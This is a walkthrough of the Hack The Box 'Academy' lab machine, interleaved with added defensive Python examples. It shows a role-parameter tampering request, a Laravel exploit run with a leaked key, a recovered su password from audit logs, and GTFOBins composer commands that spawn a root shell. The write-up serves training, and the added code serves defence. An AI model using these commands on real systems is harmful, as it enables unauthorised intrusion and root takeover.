Summary

Academy is an easy Linux box that can be exploited by registering a user with administrator privileges. After authenticating as an admin, a new sub-domain is discovered. It runs a vulnerable version of the Laravel framework, which was used to gain an initial foothold. After finding sensitive information in environment variables and log files, it is possible to switch to a higher-privileged user. This user was allowed to run composer as root, which has a GTFOBins entry that can be used to spawn a root shell.
This is a manual walkthrough without the use of Metasploit.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.10.10.215

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy

The first thing I checked was the web server. The user is presented with the following page:


By brute-forcing directories on the web server you will find a login page and a register page. You will also find an admin login page. First, register a user. The registration request was intercepted:

POST /register.php HTTP/1.1
Host: academy.htb
Origin: http://academy.htb
Referer: http://academy.htb/register.php
Cookie: PHPSESSID=f6iik1a1kgi019sd8489kp4smk
[...]

uid=jeroen&password=password123%21&confirm=password123%21&roleid=0

You will see a suspicious parameter in this request: roleid. This value was modified to 1 and the request went through. By changing the roleid you have now registered an admin user. So, log in to the admin section at /admin.php.
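The roleid parameter is a mass-assignment problem: the server stores whatever role the client submits. The following is an added example, not code from this writeup or from the box's register.php, showing a registration handler that trusts the client's roleid beside one that allow-lists the accepted fields and assigns the role server-side. Role values 0 (user) and 1 (admin), the dict-based user records, the TAMPER_LOG list and the function names are assumptions made for this example; the form body is the intercepted request shown above.

```python
"""Added example, not from the original writeup or the box's register.php:
a registration handler that trusts the client's roleid beside one that does
not. Roles, record layout and the tamper log are constructed for this example.
"""
from urllib.parse import parse_qs

ROLE_USER = 0
ROLE_ADMIN = 1
ALLOWED_REGISTRATION_FIELDS = {"uid", "password", "confirm"}

# Unexpected parameters seen during registration; a real app would log these.
TAMPER_LOG = []


def parse_body(body: str) -> dict:
    """Decode a URL-encoded form body into a flat dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def register_vulnerable(form: dict) -> dict:
    """Mass-assigns submitted fields into the user record, roleid included.

    This mirrors the weakness in the intercepted request: whatever roleid
    the client sends is stored as the user's role.
    """
    if form.get("password") != form.get("confirm"):
        raise ValueError("passwords do not match")
    return {
        "uid": form["uid"],
        "roleid": int(form.get("roleid", ROLE_USER)),  # client-controlled
    }


def register_hardened(form: dict) -> dict:
    """Accepts only allow-listed fields; the role is assigned server-side."""
    unexpected = sorted(set(form) - ALLOWED_REGISTRATION_FIELDS)
    if unexpected:
        # Unknown parameters are a tampering signal: record them, never honour them.
        TAMPER_LOG.append((form.get("uid", "?"), unexpected))
    if form.get("password") != form.get("confirm"):
        raise ValueError("passwords do not match")
    return {"uid": form["uid"], "roleid": ROLE_USER}


if __name__ == "__main__":
    tampered = parse_body(
        "uid=jeroen&password=password123%21&confirm=password123%21&roleid=1"
    )
    print("vulnerable:", register_vulnerable(tampered))  # roleid 1
    print("hardened:  ", register_hardened(tampered))    # roleid 0
    print("flagged:   ", TAMPER_LOG)
```

The hardened handler does two things the vulnerable one skips: it never reads a role from the request, and it records unknown parameters so that a tampered registration shows up in the application log instead of silently succeeding.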

Subdomain Discovery

The admin section lists a new sub-domain and exposes a lot of sensitive information, including a Laravel token which can also be intercepted with Burp. This is a Base64-encoded value. Searchsploit was used to look for vulnerabilities within the Laravel framework:


Exploitation

Since this is preparation for the OSCP, I did not use the Metasploit module but looked for an exploit script on GitHub. This script was used. The following command was executed to spawn an interactive shell:

pwn_laravel.py http://dev-staging-01.academy.htb/ dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= -i

To upgrade this interactive shell to a reverse shell, a PHP reverse-shell command from Payloads All The Things was used. A reverse shell was obtained as the www-data user.


Privilege Escalation

Several enumeration scripts were used; I found linpeas to be the most useful. Linpeas found the following plaintext password inside an environment variable file:

The home folder was checked to look for users on the system. The following users were identified:

www-data@academy:/home$ ls -la /home
21y4d  ch4p  cry0l1t3  egre55  g0blin  mrb3n

All of these were tried, and luckily the password was valid for the cry0l1t3 user. This gives you user.txt.

After this, linpeas was run again as the new user. It flagged the following:


I didn't like this part so much and was stuck here for a while; apparently one of the files contains a hex value which is the encoded password for one of the users. I relied on a hint, but it can be found with:

cry0l1t3@academy:/var/log$ grep -rnw '/var/log/' -e 'comm="su"'

You will obtain the following:

/var/log/audit/audit.log.3:32:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A

This hex value translates to mrb3n_Ac@d3my!, which can be used to authenticate as the mrb3n user. It was checked what commands this user can run with sudo:

mrb3n@academy:~$ sudo -l
[sudo] password for mrb3n: 

Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
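Before following up on the sudo rights listed above, here is an added example for the audit-log finding (not code from this writeup): a hygiene check that scans auditd output for TTY records in which pam_tty_audit captured keystrokes typed into su, sudo or similar commands, which is exactly how the password ended up in audit.log.3. The SAMPLE_LOG lines, the SENSITIVE_COMMS set and the function names are constructed for this example; the record format matches the line quoted earlier, but the hex payloads are different.

```python
"""Added example, not from the original writeup: find auditd TTY records that
captured keystrokes for credential-handling commands. The sample log lines are
constructed (same format as the record in the writeup, different payloads).
"""
import re

# Commands whose TTY input is almost always a password or other secret.
SENSITIVE_COMMS = {"su", "sudo", "passwd", "ssh"}

TTY_RE = re.compile(
    r'type=TTY msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\): '
    r'tty pid=(?P<pid>\d+) uid=(?P<uid>\d+) auid=(?P<auid>\d+) ses=(?P<ses>\d+) '
    r'major=\d+ minor=\d+ comm="(?P<comm>[^"]*)" data=(?P<data>[0-9A-Fa-f]*)'
)

# Constructed sample: one shell command, one su prompt, one unrelated record.
SAMPLE_LOG = """\
type=TTY msg=audit(1597199000.100:80): tty pid=2500 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6C73202D6C610A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=53616D706C65505740310A
type=USER_AUTH msg=audit(1597199294.000:85): pid=2520 uid=1002 auid=0 ses=1 msg='op=PAM:authentication'
"""


def decode_tty_data(hex_data: str) -> str:
    """The data field holds the raw keystroke bytes, hex-encoded."""
    return bytes.fromhex(hex_data).decode("utf-8", errors="replace")


def parse_tty_records(log_text: str) -> list:
    """Return every TTY record as a dict, with its keystrokes decoded."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.search(line)
        if not m:
            continue  # other audit record types carry no keystrokes
        rec = m.groupdict()
        rec["keystrokes"] = decode_tty_data(rec["data"])
        rec["sensitive"] = rec["comm"] in SENSITIVE_COMMS
        records.append(rec)
    return records


def exposure_report(log_text: str) -> list:
    """One line per sensitive record, without repeating the captured secret."""
    lines = []
    for rec in parse_tty_records(log_text):
        if rec["sensitive"]:
            lines.append(
                f"serial={rec['serial']} uid={rec['uid']} auid={rec['auid']} "
                f"comm={rec['comm']}: {len(rec['keystrokes'])} keystrokes captured"
            )
    return lines


if __name__ == "__main__":
    for line in exposure_report(SAMPLE_LOG):
        print(line)
```

The report deliberately prints the number of captured keystrokes rather than the decoded text, so it can be pasted into a ticket. The fix belongs on the logging side: pam_tty_audit's log_passwd option should stay off (keystrokes typed with echo disabled are then not recorded), and /var/log/audit should not be readable by unprivileged users.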

The sudo -l output showed that composer can be run as root. This binary has a GTFOBins entry that can be used to obtain a root shell by executing the following commands:

TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

This gives you a root shell.
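As a defender's counterpart to the GTFOBins step, here is an added example (not code from this writeup): a checker that parses sudo -l output and flags allowed commands whose binaries are known to spawn a shell under sudo, as composer does via run-script. SHELL_ESCAPE_BINARIES is an illustrative subset of the GTFOBins sudo list, not the full list; SAMPLE_OUTPUT_MRB3N is the output quoted above, and SAMPLE_OUTPUT_OTHER is a constructed variant (hypothetical user and host) with a NOPASSWD rule and a multi-command entry.

```python
"""Added example, not from the original writeup: audit `sudo -l` output for
commands that GTFOBins documents as able to spawn a shell under sudo.

SHELL_ESCAPE_BINARIES is an illustrative subset (assumption: extend it from
GTFOBins for real use). The first sample is the output quoted in the writeup;
the second is constructed to exercise NOPASSWD and multi-command rules.
"""
import re
from os.path import basename

SHELL_ESCAPE_BINARIES = {
    "composer", "vim", "vi", "find", "awk", "perl", "python3",
    "less", "more", "env", "bash", "sh",
}

# One rule line: "(runas) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

SAMPLE_OUTPUT_MRB3N = """\
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer
"""

SAMPLE_OUTPUT_OTHER = """\
User deploy may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/find, /usr/bin/id
    (ALL : ALL) /usr/bin/systemctl restart apache2
"""


def parse_sudo_rules(output: str) -> list:
    """Return (runas, tags, command) triples from the 'may run' section.

    Simplification: sudo wraps very long rules onto continuation lines,
    which this parser does not join.
    """
    rules = []
    in_rules = False
    for raw in output.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = [t.strip() for t in m.group("tags").split(":") if t.strip()]
        for cmd in m.group("cmds").split(", "):
            rules.append((m.group("runas"), tags, cmd.strip()))
    return rules


def flag_shell_escapes(output: str) -> list:
    """Rules whose binary (or a blanket ALL) hands the caller a root shell."""
    findings = []
    for runas, tags, cmd in parse_sudo_rules(output):
        binary = "ALL" if cmd == "ALL" else basename(cmd.split()[0])
        if binary == "ALL" or binary in SHELL_ESCAPE_BINARIES:
            findings.append({
                "binary": binary,
                "command": cmd,
                "runas": runas,
                "nopasswd": "NOPASSWD" in tags,
            })
    return findings


if __name__ == "__main__":
    for sample in (SAMPLE_OUTPUT_MRB3N, SAMPLE_OUTPUT_OTHER):
        for f in flag_shell_escapes(sample):
            print(f"{f['binary']:10} runas={f['runas']!r:12} "
                  f"nopasswd={f['nopasswd']} {f['command']}")
```

Run against the box's output the checker reports the single composer rule; the point for an administrator is that any flagged entry is equivalent to granting a root shell, regardless of how harmless the binary's normal purpose looks.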


Conclusion

This was a pretty cool box, especially with the nice interface for the web application. Obtaining the initial foothold was relatively straightforward but useful. Obtaining higher privileged accounts was more difficult as the credentials were quite difficult to find. The final escalation to root was easy with the GTFOBins entry for composer. Hope you enjoyed this writeup!